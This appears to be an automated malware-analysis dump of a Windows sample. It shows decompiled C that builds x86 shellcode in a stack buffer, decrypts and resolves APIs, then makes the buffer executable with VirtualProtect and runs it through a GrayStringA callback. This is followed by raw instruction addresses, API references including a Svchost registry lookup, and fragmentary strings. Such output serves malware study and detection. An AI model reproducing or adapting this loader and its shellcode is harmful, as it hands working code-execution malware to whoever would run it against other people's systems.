				char _v586;
				char _v587;
				char _v588;
				char _v589;
				char _v590;
				char _v591;
				char _v592;
				char _v593;
				char _v594;
				char _v595;
				char _v596;
				char _v597;
				char _v598;
				char _v599;
				char _v600;
				char _v601;
				char _v602;
				char _v603;
				char _v604;
				char _v605;
				char _v606;
				char _v607;
				char _v608;
				char _v609;
				char _v610;
				char _v611;
				char _v612;
				char _v613;
				char _v614;
				char _v615;
				char _v616;
				char _v617;
				char _v618;
				char _v619;
				char _v620;
				char _v621;
				char _v622;
				char _v623;
				_Unknown_base(*)() _v624;
				struct HWND__* _v628;
				struct HWND__** _v632;
				char _v636;
				struct HWND__* _v640;
				long _v644;
				void* _v1644;
				void* _t768;

				_v624 = 0xe9;
				_v623 = 0xcc;
				_v622 = 0;
				_v621 = 0;
				_v620 = 0;
				_v619 = 0x55;
				_v618 = 0x8b;
				_v617 = 0xec;
				_v616 = 0x56;
				_v615 = 0x8b;
				_v614 = 0x75;
				_v613 = 8;
				_v612 = 0xba;
				_v611 = 0xe4;
				_v610 = 0x1f;
				_v609 = 0;
				_v608 = 0;
				_v607 = 0x57;
				_v606 = 0xeb;
				_v605 = 0xe;
				_v604 = 0x8b;
				_v603 = 0xca;
				_v602 = 0xd1;
				_v601 = 0xe8;
				_v600 = 0xc1;
				_v599 = 0xe1;
				_v598 = 7;
				_v597 = 0x46;
				_v596 = 0xb;
				_v595 = 0xc8;
				_v594 = 3;
				_v593 = 0xcf;
				_v592 = 3;
				_v591 = 0xd1;
				_v590 = 0xf;
				_v589 = 0xbe;
				_v588 = 0x3e;
				_v587 = 0x8b;
				_v586 = 0xc2;
				_v585 = 0x85;
				_v584 = 0xff;
				_v583 = 0x75;
				_v582 = 0xe9;
				_v581 = 0x5f;
				_v580 = 0x5e;
				_v579 = 0x5d;
				_v578 = 0xc3;
				_v577 = 0x55;
				_v576 = 0x8b;
				_v575 = 0xec;
				_v574 = 0x83;
				_v573 = 0xec;
				_v572 = 0x1c;
				_v571 = 0x83;
				_v570 = 0x65;
				_v569 = 0xfc;
				_v568 = 0;
				_v567 = 0x8b;
				_v566 = 0x45;
				_v565 = 8;
				_v564 = 0x89;
				_v563 = 0x45;
				_v562 = 0xf4;
				_v561 = 0x8b;
				_v560 = 0x45;
				_v559 = 0xf4;
				_v558 = 0x8b;
				_v557 = 0x4d;
				_v556 = 8;
				_v555 = 3;
				_v554 = 0x48;
				_v553 = 0x3c;
				_v552 = 0x89;
				_v551 = 0x4d;
				_v550 = 0xf0;
				_v549 = 0x6a;
				_v548 = 8;
				_v547 = 0x58;
				_v546 = 0x6b;
				_v545 = 0xc0;
				_v544 = 0;
				_v543 = 0x8b;
				_v542 = 0x4d;
				_v541 = 0xf0;
				_v540 = 0x8b;
				_v539 = 0x55;
				_v538 = 8;
				_v537 = 3;
				_v536 = 0x54;
				_v535 = 1;
				_v534 = 0x78;
				_v533 = 0x89;
				_v532 = 0x55;
				_v531 = 0xf8;
				_v530 = 0x8b;
				_v529 = 0x45;
				_v528 = 0xf8;
				_v527 = 0x8b;
				_v526 = 0x4d;
				_v525 = 8;
				_v524 = 3;
				_v523 = 0x48;
				_v522 = 0x20;
				_v521 = 0x89;
				_v520 = 0x4d;
				_v519 = 0xec;
				_v518 = 0x8b;
				_v517 = 0x45;
				_v516 = 0xf8;
				_v515 = 0x8b;
				_v514 = 0x4d;
				_v513 = 8;
				_v512 = 3;
				_v511 = 0x48;
				_v510 = 0x1c;
				_v509 = 0x89;
				_v508 = 0x4d;
				_v507 = 0xe4;
				_v506 = 0x8b;
				_v505 = 0x45;
				_v504 = 0xf8;
				_v503 = 0x8b;
				_v502 = 0x4d;
				_v501 = 8;
				_v500 = 3;
				_v499 = 0x48;
				_v498 = 0x24;
				_v497 = 0x89;
				_v496 = 0x4d;
				_v495 = 0xe8;
				_v494 = 0x83;
				_v493 = 0x65;
				_v492 = 0xfc;
				_v491 = 0;
				_v490 = 0xeb;
				_v489 = 7;
				_v488 = 0x8b;
				_v487 = 0x45;
				_v486 = 0xfc;
				_v485 = 0x40;
				_v484 = 0x89;
				_v483 = 0x45;
				_v482 = 0xfc;
				_v481 = 0x8b;
				_v480 = 0x45;
				_v479 = 0xf8;
				_v478 = 0x8b;
				_v477 = 0x4d;
				_v476 = 0xfc;
				_v475 = 0x3b;
				_v474 = 0x48;
				_v473 = 0x18;
				_v472 = 0x73;
				_v471 = 0x31;
				_v470 = 0x8b;
				_v469 = 0x45;
				_v468 = 0xfc;
				_v467 = 0x8b;
				_v466 = 0x4d;
				_v465 = 0xec;
				_v464 = 0x8b;
				_v463 = 0x55;
				_v462 = 8;
				_v461 = 3;
				_v460 = 0x14;
				_v459 = 0x81;
				_v458 = 0x52;
				_v457 = 0xe8;
				_v456 = 0x59;
				_v455 = 0xff;
				_v454 = 0xff;
				_v453 = 0xff;
				_v452 = 0x59;
				_v451 = 0x3b;
				_v450 = 0x45;
				_v449 = 0xc;
				_v448 = 0x75;
				_v447 = 0x17;
				_v446 = 0x8b;
				_v445 = 0x45;
				_v444 = 0xfc;
				_v443 = 0x8b;
				_v442 = 0x4d;
				_v441 = 0xe8;
				_v440 = 0xf;
				_v439 = 0xb7;
				_v438 = 4;
				_v437 = 0x41;
				_v436 = 0x8b;
				_v435 = 0x4d;
				_v434 = 0xe4;
				_v433 = 0x8b;
				_v432 = 0x55;
				_v431 = 8;
				_v430 = 3;
				_v429 = 0x14;
				_v428 = 0x81;
				_v427 = 0x8b;
				_v426 = 0xc2;
				_v425 = 0xeb;
				_v424 = 4;
				_v423 = 0xeb;
				_v422 = 0xbd;
				_v421 = 0x33;
				_v420 = 0xc0;
				_v419 = 0x8b;
				_v418 = 0xe5;
				_v417 = 0x5d;
				_v416 = 0xc3;
				_v415 = 0x55;
				_v414 = 0x8b;
				_v413 = 0xec;
				_v412 = 0x83;
				_v411 = 0xec;
				_v410 = 0x18;
				_v409 = 0x53;
				_v408 = 0x56;
				_v407 = 0x57;
				_v406 = 0x6a;
				_v405 = 0x4f;
				_v404 = 0x5e;
				_v403 = 0x6a;
				_v402 = 0x5a;
				_v401 = 0x5a;
				_v400 = 0x6a;
				_v399 = 0x58;
				_v398 = 0x59;
				_v397 = 0x33;
				_v396 = 0xc0;
				_v395 = 0x66;
				_v394 = 0x89;
				_v393 = 0x75;
				_v392 = 0xf0;
				_v391 = 0x66;
				_v390 = 0x89;
				_v389 = 0x55;
				_v388 = 0xf2;
				_v387 = 0x66;
				_v386 = 0x89;
				_v385 = 0x4d;
				_v384 = 0xf4;
				_v383 = 0x66;
				_v382 = 0x89;
				_v381 = 0x45;
				_v380 = 0xf6;
				_v379 = 0x66;
				_v378 = 0x89;
				_v377 = 0x75;
				_v376 = 0xe8;
				_v375 = 0x66;
				_v374 = 0x89;
				_v373 = 0x55;
				_v372 = 0xea;
				_v371 = 0x66;
				_v370 = 0x89;
				_v369 = 0x4d;
				_v368 = 0xec;
				_v367 = 0x66;
				_v366 = 0x89;
				_v365 = 0x45;
				_v364 = 0xee;
				_v363 = 0x64;
				_v362 = 0xa1;
				_v361 = 0x30;
				_v360 = 0;
				_v359 = 0;
				_v358 = 0;
				_v357 = 0x8b;
				_v356 = 0x40;
				_v355 = 0xc;
				_v354 = 0x8b;
				_v353 = 0x40;
				_v352 = 0xc;
				_v351 = 0x8b;
				_v350 = 0;
				_v349 = 0x8b;
				_v348 = 0;
				_v347 = 0x8b;
				_v346 = 0x40;
				_v345 = 0x18;
				_v344 = 0x8b;
				_v343 = 0xf0;
				_v342 = 0x68;
				_v341 = 0x4b;
				_v340 = 0x27;
				_v339 = 0xd6;
				_v338 = 0xdb;
				_v337 = 0x56;
				_v336 = 0xe8;
				_v335 = 0xa;
				_v334 = 0xff;
				_v333 = 0xff;
				_v332 = 0xff;
				_v331 = 0x68;
				_v330 = 0x3d;
				_v329 = 0x3a;
				_v328 = 0xc9;
				_v327 = 0x85;
				_v326 = 0x56;
				_v325 = 0x8b;
				_v324 = 0xd8;
				_v323 = 0xe8;
				_v322 = 0xfd;
				_v321 = 0xfe;
				_v320 = 0xff;
				_v319 = 0xff;
				_v318 = 0x68;
				_v317 = 0xc0;
				_v316 = 0xc9;
				_v315 = 0xe6;
				_v314 = 0x77;
				_v313 = 0x56;
				_v312 = 0x8b;
				_v311 = 0xf8;
				_v310 = 0xe8;
				_v309 = 0xf0;
				_v308 = 0xfe;
				_v307 = 0xff;
				_v306 = 0xff;
				_v305 = 0x83;
				_v304 = 0xc4;
				_v303 = 0x18;
				_v302 = 0x8b;
				_v301 = 0xf0;
				_v300 = 0x6a;
				_v299 = 4;
				_v298 = 0x68;
				_v297 = 0;
				_v296 = 0x30;
				_v295 = 0;
				_v294 = 0;
				_v293 = 0x68;
				_v292 = 0xb6;
				_v291 = 0x43;
				_v290 = 3;
				_v289 = 0;
				_v288 = 0x6a;
				_v287 = 0;
				_v286 = 0xff;
				_v285 = 0xd3;
				_v284 = 0x89;
				_v283 = 0x45;
				_v282 = 0xfc;
				_v281 = 0x8d;
				_v280 = 0x45;
				_v279 = 0xf0;
				_v278 = 0x50;
				_v277 = 0x8d;
				_v276 = 0x45;
				_v275 = 0xe8;
				_v274 = 0x50;
				_v273 = 0x6a;
				_v272 = 0;
				_v271 = 0xff;
				_v270 = 0xd7;
				_v269 = 0x50;
				_v268 = 0x33;
				_v267 = 0xff;
				_v266 = 0x57;
				_v265 = 0xff;
				_v264 = 0xd6;
				_v263 = 0x68;
				_v262 = 0xb6;
				_v261 = 0x43;
				_v260 = 3;
				_v259 = 0;
				_v258 = 0x50;
				_v257 = 0xff;
				_v256 = 0x75;
				_v255 = 0xfc;
				_v254 = 0xe8;
				_v253 = 0xb6;
				_v252 = 0;
				_v251 = 0;
				_v250 = 0;
				_v249 = 0x83;
				_v248 = 0xc4;
				_v247 = 0xc;
				_v246 = 0xbe;
				_v245 = 0;
				_v244 = 0x30;
				_v243 = 0;
				_v242 = 0;
				_v241 = 0x6a;
				_v240 = 0x40;
				_v239 = 0x56;
				_v238 = 0x68;
				_v237 = 0xb7;
				_v236 = 0x17;
				_v235 = 0;
				_v234 = 0;
				_v233 = 0x57;
				_v232 = 0xff;
				_v231 = 0xd3;
				_v230 = 0x6a;
				_v229 = 4;
				_v228 = 0x56;
				_v227 = 0x68;
				_v226 = 0xff;
				_v225 = 0x2b;
				_v224 = 3;
				_v223 = 0;
				_v222 = 0x57;
				_v221 = 0x89;
				_v220 = 0x45;
				_v219 = 0xf8;
				_v218 = 0xff;
				_v217 = 0xd3;
				_v216 = 0x8b;
				_v215 = 0x7d;
				_v214 = 0xf8;
				_v213 = 0x8b;
				_v212 = 0xf0;
				_v211 = 0x68;
				_v210 = 0xb7;
				_v209 = 0x17;
				_v208 = 0;
				_v207 = 0;
				_v206 = 0xff;
				_v205 = 0x75;
				_v204 = 0xfc;
				_v203 = 0x57;
				_v202 = 0xe8;
				_v201 = 0x82;
				_v200 = 0;
				_v199 = 0;
				_v198 = 0;
				_v197 = 0x83;
				_v196 = 0xc4;
				_v195 = 0xc;
				_v194 = 0x33;
				_v193 = 0xdb;
				_v192 = 0x8d;
				_v191 = 0x14;
				_v190 = 0x3b;
				_v189 = 0x8a;
				_v188 = 0xc3;
				_v187 = 0x2a;
				_v186 = 2;
				_v185 = 0xb1;
				_v184 = 0x25;
				_v183 = 0xc0;
				_v182 = 0xc8;
				_v181 = 3;
				_v180 = 0x2a;
				_v179 = 0xc3;
				_v178 = 0x34;
				_v177 = 0x76;
				_v176 = 0xd0;
				_v175 = 0xc0;
				_v174 = 0x2a;
				_v173 = 0xc3;
				_v172 = 0xf6;
				_v171 = 0xd0;
				_v170 = 0x32;
				_v169 = 0xc3;
				_v168 = 0xc0;
				_v167 = 0xc8;
				_v166 = 3;
				_v165 = 0x2a;
				_v164 = 0xc8;
				_v163 = 0x8a;
				_v162 = 0xc3;
				_v161 = 0x32;
				_v160 = 0xcb;
				_v159 = 2;
				_v158 = 0xcb;
				_v157 = 0x80;
				_v156 = 0xf1;
				_v155 = 0xfd;
				_v154 = 0xf6;
				_v153 = 0xd9;
				_v152 = 0x80;
				_v151 = 0xf1;
				_v150 = 0x51;
				_v149 = 0x80;
				_v148 = 0xe9;
				_v147 = 0x31;
				_v146 = 0xf6;
				_v145 = 0xd1;
				_v144 = 0x2a;
				_v143 = 0xcb;
				_v142 = 0x32;
				_v141 = 0xcb;
				_v140 = 0xd0;
				_v139 = 0xc9;
				_v138 = 0x80;
				_v137 = 0xc1;
				_v136 = 0x58;
				_v135 = 0x80;
				_v134 = 0xf1;
				_v133 = 0x7c;
				_v132 = 0x2a;
				_v131 = 0xcb;
				_v130 = 0x32;
				_v129 = 0xcb;
				_v128 = 0x80;
				_v127 = 0xc1;
				_v126 = 0x3f;
				_v125 = 0x80;
				_v124 = 0xf1;
				_v123 = 0x73;
				_v122 = 0xc0;
				_v121 = 0xc9;
				_v120 = 2;
				_v119 = 2;
				_v118 = 0xcb;
				_v117 = 0x32;
				_v116 = 0xcb;
				_v115 = 0x2a;
				_v114 = 0xc1;
				_v113 = 0x2c;
				_v112 = 0x16;
				_v111 = 0x43;
				_v110 = 0x88;
				_v109 = 2;
				_v108 = 0x81;
				_v107 = 0xfb;
				_v106 = 0xb7;
				_v105 = 0x17;
				_v104 = 0;
				_v103 = 0;
				_v102 = 0x72;
				_v101 = 0xa4;
				_v100 = 0x8b;
				_v99 = 0x45;
				_v98 = 0xfc;
				_v97 = 0x68;
				_v96 = 0xff;
				_v95 = 0x2b;
				_v94 = 3;
				_v93 = 0;
				_v92 = 5;
				_v91 = 0xb7;
				_v90 = 0x17;
				_v89 = 0;
				_v88 = 0;
				_v87 = 0x50;
				_v86 = 0x56;
				_v85 = 0xe8;
				_v84 = 0xd;
				_v83 = 0;
				_v82 = 0;
				_v81 = 0;
				_v80 = 0x56;
				_v79 = 0xff;
				_v78 = 0xd7;
				_v77 = 0x83;
				_v76 = 0xc4;
				_v75 = 0x10;
				_v74 = 0x5f;
				_v73 = 0x5e;
				_v72 = 0x5b;
				_v71 = 0x8b;
				_v70 = 0xe5;
				_v69 = 0x5d;
				_v68 = 0xc3;
				_v67 = 0x55;
				_v66 = 0x8b;
				_v65 = 0xec;
				_v64 = 0x8b;
				_v63 = 0x55;
				_v62 = 0x10;
				_v61 = 0x85;
				_v60 = 0xd2;
				_v59 = 0x74;
				_v58 = 0x15;
				_v57 = 0x8b;
				_v56 = 0x4d;
				_v55 = 8;
				_v54 = 0x56;
				_v53 = 0x8b;
				_v52 = 0x75;
				_v51 = 0xc;
				_v50 = 0x2b;
				_v49 = 0xf1;
				_v48 = 0x8a;
				_v47 = 4;
				_v46 = 0xe;
				_v45 = 0x88;
				_v44 = 1;
				_v43 = 0x41;
				_v42 = 0x83;
				_v41 = 0xea;
				_v40 = 1;
				_v39 = 0x75;
				_v38 = 0xf5;
				_v37 = 0x5e;
				_v36 = 0x5d;
				_v35 = 0xc3;
				_v34 = 0;
				_v33 = 0;
				_v32 = 0;
				_v31 = 0;
				_v636 = 0xa;
				_v632 =  &_v636;
				_v24 = 0x3b;
				_v23 = 0x2d;
				_v22 = 0x19;
				_v21 = 0x72;
				_v20 = 0x73;
				_v628 = 0;
				_v640 = 0;
				while(1) {
					 *(_t768 + 0xfffffffffffffff4) = 0xf;
					 *(_t768 + 0xbadba1) = 0x1f;
					 *(_t768 + 0xbadba1) = 0x2d;
					 *(_t768 + 0xfffffffffffffff7) = 0x46;
					 *(_t768 + 0xbadba1) = 0x41;
					_v632 =  &_v628;
					_v28 = 0;
					while(_v28 < 5) {
						 *(_t768 + _v28 - 0xc) =  *(_t768 + _v28 - 0xc) & 0x000000ff ^  *(_v632 + _v28 % 3);
						_v28 = _v28 + 1;
					}
					if(( *(_t768 + 0xffffffffffffffec) & 0x000000ff) == ( *(_t768 + 0xfffffffffffffff4) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff) || ( *(_t768 + 0xffffffffffffffef) & 0x000000ff) == ( *(_t768 + 0xfffffffffffffff7) & 0x000000ff) || ( *(_t768 + 0xbadb99) & 0x000000ff) == ( *(_t768 + 0xbadba1) & 0x000000ff)) {
						VirtualProtect( &_v624, 0x252, 0x40,  &_v644); // executed
						GrayStringA(GetDC(0), 0,  &_v624,  &_v1644, 0, 0, 0, 0, 0); // executed
						MessageBoxW(0, 0, 0, 0);
						_v8 = 1;
						while(_v8 < _a4) {
							if(lstrcmpiW( *(_a8 + _v8 * 4), L"/k") == 0 || lstrcmpiW( *(_a8 + _v8 * 4), L"-k") == 0) {
								_v8 = _v8 + 1;
								if(_v8 < _a4) {
									if(E00A315A0( *(_a8 + _v8 * 4)) != 0) {
										_v8 = _v8 + 1;
										continue;
									}
									return 0;
								}
								return 0;
							} else {
								return 0;
							}
						}
						return 0;
					} else {
						_v628 =  &(_v628->i);
						continue;
					}
				}
			}

0x00a31679
0x00a31680
0x00a31687
0x00a3168e
0x00a31695
0x00a3169c
0x00a316a3
0x00a316aa
0x00a316b1
0x00a316b8
0x00a316bf
0x00a316c6
0x00a316cd
0x00a316d4
0x00a316db
0x00a316e2
0x00a316e9
0x00a316f0
0x00a316f7
0x00a316fe
0x00a31705
0x00a3170c
0x00a31713
0x00a3171a
0x00a31721
0x00a31728
0x00a3172f
0x00a31736
0x00a3173d
0x00a31744
0x00a3174b
0x00a31752
0x00a31759
0x00a31760
0x00a31767
0x00a3176e
0x00a31775
0x00a3177c
0x00a31783
0x00a3178a
0x00a31791
0x00a31798
0x00a3179f
0x00a317a6
0x00a317ad
0x00a317b4
0x00a317bb
0x00a317c2
0x00a317c9
0x00a317d0
0x00a317d7
0x00a317de
0x00a317e5
0x00a317ec
0x00a317f3
0x00a317fa
0x00a31801
0x00a31808
0x00a3180f
0x00a31816
0x00a3181d
0x00a31824
0x00a3182b
0x00a31832
0x00a31839
0x00a31840
0x00a31847
0x00a3184e
0x00a31855
0x00a3185c
0x00a31863
0x00a3186a
0x00a31871
0x00a31878
0x00a3187f
0x00a31886
0x00a3188d
0x00a31894
0x00a3189b
0x00a318a2
0x00a318a9
0x00a318b0
0x00a318b7
0x00a318be
0x00a318c5
0x00a318cc
0x00a318d3
0x00a318da
0x00a318e1
0x00a318e8
0x00a318ef
0x00a318f6
0x00a318fd
0x00a31904
0x00a3190b
0x00a31912
0x00a31919
0x00a31920
0x00a31927
0x00a3192e
0x00a31935
0x00a3193c
0x00a31943
0x00a3194a
0x00a31951
0x00a31958
0x00a3195f
0x00a31966
0x00a3196d
0x00a31974
0x00a3197b
0x00a31982
0x00a31989
0x00a31990
0x00a31997
0x00a3199e
0x00a319a5
0x00a319ac
0x00a319b3
0x00a319ba
0x00a319c1
0x00a319c8
0x00a319cf
0x00a319d6
0x00a319dd
0x00a319e4
0x00a319eb
0x00a319f2
0x00a319f9
0x00a31a00
0x00a31a07
0x00a31a0e
0x00a31a15
0x00a31a1c
0x00a31a23
0x00a31a2a
0x00a31a31
0x00a31a38
0x00a31a3f
0x00a31a46
0x00a31a4d
0x00a31a54
0x00a31a5b
0x00a31a62
0x00a31a69
0x00a31a70
0x00a31a77
0x00a31a7e
0x00a31a85
0x00a31a8c
0x00a31a93
0x00a31a9a
0x00a31aa1
0x00a31aa8
0x00a31aaf
0x00a31ab6
0x00a31abd
0x00a31ac4
0x00a31acb
0x00a31ad2
0x00a31ad9
0x00a31ae0
0x00a31ae7
0x00a31aee
0x00a31af5
0x00a31afc
0x00a31b03
0x00a31b0a
0x00a31b11
0x00a31b18
0x00a31b1f
0x00a31b26
0x00a31b2d
0x00a31b34
0x00a31b3b
0x00a31b42
0x00a31b49
0x00a31b50
0x00a31b57
0x00a31b5e
0x00a31b65
0x00a31b6c
0x00a31b73
0x00a31b7a
0x00a31b81
0x00a31b88
0x00a31b8f
0x00a31b96
0x00a31b9d
0x00a31ba4
0x00a31bab
0x00a31bb2
0x00a31bb9
0x00a31bc0
0x00a31bc7
0x00a31bce
0x00a31bd5
0x00a31bdc
0x00a31be3
0x00a31bea
0x00a31bf1
0x00a31bf8
0x00a31bff
0x00a31c06
0x00a31c0d
0x00a31c14
0x00a31c1b
0x00a31c22
0x00a31c29
0x00a31c30
0x00a31c37
0x00a31c3e
0x00a31c45
0x00a31c4c
0x00a31c53
0x00a31c5a
0x00a31c61
0x00a31c68
0x00a31c6f
0x00a31c76
0x00a31c7d
0x00a31c84
0x00a31c8b
0x00a31c92
0x00a31c99
0x00a31ca0
0x00a31ca7
0x00a31cae
0x00a31cb5
0x00a31cbc
0x00a31cc3
0x00a31cca
0x00a31cd1
0x00a31cd8
0x00a31cdf
0x00a31ce6
0x00a31ced
0x00a31cf4
0x00a31cfb
0x00a31d02
0x00a31d09
0x00a31d10
0x00a31d17
0x00a31d1e
0x00a31d25
0x00a31d2c
0x00a31d33
0x00a31d3a
0x00a31d41
0x00a31d48
0x00a31d4f
0x00a31d56
0x00a31d5d
0x00a31d64
0x00a31d6b
0x00a31d72
0x00a31d79
0x00a31d80
0x00a31d87
0x00a31d8e
0x00a31d95
0x00a31d9c
0x00a31da3
0x00a31daa
0x00a31db1
0x00a31db8
0x00a31dbf
0x00a31dc6
0x00a31dcd
0x00a31dd4
0x00a31ddb
0x00a31de2
0x00a31de9
0x00a31df0
0x00a31df7
0x00a31dfe
0x00a31e05
0x00a31e0c
0x00a31e13
0x00a31e1a
0x00a31e21
0x00a31e28
0x00a31e2f
0x00a31e36
0x00a31e3d
0x00a31e44
0x00a31e4b
0x00a31e52
0x00a31e59
0x00a31e60
0x00a31e67
0x00a31e6e
0x00a31e75
0x00a31e7c
0x00a31e83
0x00a31e8a
0x00a31e91
0x00a31e98
0x00a31e9f
0x00a31ea6
0x00a31ead
0x00a31eb4
0x00a31ebb
0x00a31ec2
0x00a31ec9
0x00a31ed0
0x00a31ed7
0x00a31ede
0x00a31ee5
0x00a31eec
0x00a31ef3
0x00a31efa
0x00a31f01
0x00a31f08
0x00a31f0f
0x00a31f16
0x00a31f1d
0x00a31f24
0x00a31f2b
0x00a31f32
0x00a31f39
0x00a31f40
0x00a31f47
0x00a31f4e
0x00a31f55
0x00a31f5c
0x00a31f63
0x00a31f6a
0x00a31f71
0x00a31f78
0x00a31f7f
0x00a31f86
0x00a31f8d
0x00a31f94
0x00a31f9b
0x00a31fa2
0x00a31fa9
0x00a31fb0
0x00a31fb7
0x00a31fbe
0x00a31fc5
0x00a31fcc
0x00a31fd3
0x00a31fda
0x00a31fe1
0x00a31fe8
0x00a31fef
0x00a31ff6
0x00a31ffd
0x00a32004
0x00a3200b
0x00a32012
0x00a32019
0x00a32020
0x00a32027
0x00a3202e
0x00a32035
0x00a3203c
0x00a32043
0x00a3204a
0x00a32051
0x00a32058
0x00a3205f
0x00a32066
0x00a3206d
0x00a32074
0x00a3207b
0x00a32082
0x00a32089
0x00a32090
0x00a32097
0x00a3209e
0x00a320a5
0x00a320ac
0x00a320b3
0x00a320ba
0x00a320c1
0x00a320c8
0x00a320cf
0x00a320d6
0x00a320dd
0x00a320e4
0x00a320eb
0x00a320f2
0x00a320f9
0x00a32100
0x00a32107
0x00a3210e
0x00a32115
0x00a3211c
0x00a32123
0x00a3212a
0x00a32131
0x00a32138
0x00a3213f
0x00a32146
0x00a3214d
0x00a32154
0x00a3215b
0x00a32162
0x00a32169
0x00a32170
0x00a32177
0x00a3217e
0x00a32185
0x00a3218c
0x00a32193
0x00a3219a
0x00a321a1
0x00a321a8
0x00a321af
0x00a321b6
0x00a321bd
0x00a321c4
0x00a321cb
0x00a321d2
0x00a321d9
0x00a321e0
0x00a321e7
0x00a321ee
0x00a321f5
0x00a321fc
0x00a32203
0x00a3220a
0x00a32211
0x00a32218
0x00a3221f
0x00a32226
0x00a3222d
0x00a32234
0x00a3223b
0x00a32242
0x00a32249
0x00a32250
0x00a32257
0x00a3225e
0x00a32265
0x00a3226c
0x00a32273
0x00a3227a
0x00a32281
0x00a32288
0x00a3228f
0x00a32296
0x00a3229d
0x00a322a4
0x00a322ab
0x00a322b2
0x00a322b9
0x00a322c0
0x00a322c7
0x00a322ce
0x00a322d5
0x00a322dc
0x00a322e3
0x00a322ea
0x00a322f1
0x00a322f8
0x00a322ff
0x00a32306
0x00a3230d
0x00a32314
0x00a3231b
0x00a32322
0x00a32329
0x00a32330
0x00a32337
0x00a3233e
0x00a32345
0x00a3234c
0x00a32353
0x00a3235a
0x00a32361
0x00a32368
0x00a3236f
0x00a32376
0x00a3237d
0x00a32384
0x00a3238b
0x00a32392
0x00a32399
0x00a323a0
0x00a323a7
0x00a323ae
0x00a323b5
0x00a323bc
0x00a323c3
0x00a323ca
0x00a323d1
0x00a323d8
0x00a323df
0x00a323e6
0x00a323ed
0x00a323f1
0x00a323f5
0x00a323f9
0x00a323fd
0x00a32401
0x00a32405
0x00a32409
0x00a3240d
0x00a32411
0x00a32415
0x00a32419
0x00a3241d
0x00a32421
0x00a32425
0x00a32429
0x00a3242d
0x00a32431
0x00a32435
0x00a32439
0x00a3243d
0x00a32441
0x00a32445
0x00a32449
0x00a3244d
0x00a32451
0x00a32455
0x00a32459
0x00a3245d
0x00a32461
0x00a32465
0x00a32469
0x00a3246d
0x00a32471
0x00a32475
0x00a32479
0x00a3247d
0x00a32481
0x00a32485
0x00a32489
0x00a3248d
0x00a32491
0x00a32495
0x00a32499
0x00a3249d
0x00a324a1
0x00a324a5
0x00a324a9
0x00a324ad
0x00a324b1
0x00a324b5
0x00a324b9
0x00a324bd
0x00a324c1
0x00a324c5
0x00a324c9
0x00a324cd
0x00a324d1
0x00a324d5
0x00a324d9
0x00a324dd
0x00a324e1
0x00a324e5
0x00a324e9
0x00a324ed
0x00a324f1
0x00a324f5
0x00a324f9
0x00a324fd
0x00a32501
0x00a32505
0x00a32509
0x00a3250d
0x00a32511
0x00a32515
0x00a32519
0x00a3251d
0x00a32521
0x00a32525
0x00a32529
0x00a3252d
0x00a32531
0x00a32535
0x00a32539
0x00a3253d
0x00a32541
0x00a32545
0x00a32549
0x00a3254d
0x00a32551
0x00a32555
0x00a32559
0x00a3255d
0x00a32561
0x00a32565
0x00a32569
0x00a3256d
0x00a32571
0x00a32575
0x00a32579
0x00a3257d
0x00a32581
0x00a32585
0x00a32595
0x00a3259b
0x00a3259f
0x00a325a3
0x00a325a7
0x00a325ab
0x00a325af
0x00a325b9
0x00a325c3
0x00a325cb
0x00a325d8
0x00a325e4
0x00a325f1
0x00a325fe
0x00a32609
0x00a3260f
0x00a32621
0x00a3264a
0x00a3261e
0x00a3261e
0x00a3266c
0x00a3270f
0x00a32738
0x00a32746
0x00a3274c
0x00a3275e
0x00a3277d
0x00a3279e
0x00a327a7
0x00a327be
0x00a3275b
0x00000000
0x00a3275b
0x00000000
0x00a327c0
0x00000000
0x00a327c6
0x00000000
0x00a327c6
0x00a3277d
0x00000000
0x00a326e6
0x00a326ef
0x00000000
0x00a326ef
0x00a3266c

APIs

VirtualProtect.KERNELBASE(000000E9,00000252,00000040,?), ref: 00A3270F
GetDC.USER32(00000000), ref: 00A32731
GrayStringA.USER32(00000000), ref: 00A32738
MessageBoxW.USER32(00000000,00000000,00000000,00000000), ref: 00A32746
lstrcmpiW.KERNEL32(?,00A50198), ref: 00A32775
lstrcmpiW.KERNEL32(?,00A501A0), ref: 00A3278E

Part of subcall function 00A315A0: RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Svchost,00000000,00020019,00000000), ref: 00A315C9

Strings

U, xrefs: 00A317C2
f, xrefs: 00A31CBC
k, xrefs: 00A3189B
2, xrefs: 00A322E3
+, xrefs: 00A32162
Z, xrefs: 00A31C8B
h, xrefs: 00A32107
], xrefs: 00A3256D
j, xrefs: 00A31F55
E, xrefs: 00A31AB6
V, xrefs: 00A31E52
e, xrefs: 00A31A0E
@, xrefs: 00A320F9
Y, xrefs: 00A31CA7
M, xrefs: 00A31951
|, xrefs: 00A323E6
E, xrefs: 00A31A54
1, xrefs: 00A31AA8
u, xrefs: 00A31798
X, xrefs: 00A31CA0
E, xrefs: 00A31A38
^, xrefs: 00A32569
e, xrefs: 00A317F3
P, xrefs: 00A3202E
C, xrefs: 00A32441
W, xrefs: 00A321FC
W, xrefs: 00A31C68
W, xrefs: 00A32043
2, xrefs: 00A32429
;, xrefs: 00A31A8C
3, xrefs: 00A31CAE
3, xrefs: 00A32035
u, xrefs: 00A3252D
*, xrefs: 00A32306
h, xrefs: 00A31F63
^, xrefs: 00A324D9
M, xrefs: 00A319A5
C, xrefs: 00A31F94
T, xrefs: 00A318E1
U, xrefs: 00A31CE6
j, xrefs: 00A3213F
], xrefs: 00A324E9
V, xrefs: 00A324BD
u, xrefs: 00A316BF
', xrefs: 00A31E3D
M, xrefs: 00A31D02
M, xrefs: 00A318B7
*, xrefs: 00A323ED
@, xrefs: 00A31DCD
M, xrefs: 00A319CF
M, xrefs: 00A3184E
U, xrefs: 00A31BB9
u, xrefs: 00A31B49
V, xrefs: 00A31C61
x, xrefs: 00A318EF
], xrefs: 00A31C22
j, xrefs: 00A31886
V, xrefs: 00A32100
t, xrefs: 00A32511
@, xrefs: 00A31E13
-, xrefs: 00A3259F
f, xrefs: 00A31CF4
f, xrefs: 00A31CD8
E, xrefs: 00A3180F
E, xrefs: 00A31966
;, xrefs: 00A3259B
h, xrefs: 00A31ED7
@, xrefs: 00A31DE2
j, xrefs: 00A32012
P, xrefs: 00A324A1
Z, xrefs: 00A31C92
W, xrefs: 00A32177
M, xrefs: 00A31A7E
H, xrefs: 00A3193C
E, xrefs: 00A31FE1
V, xrefs: 00A324A5
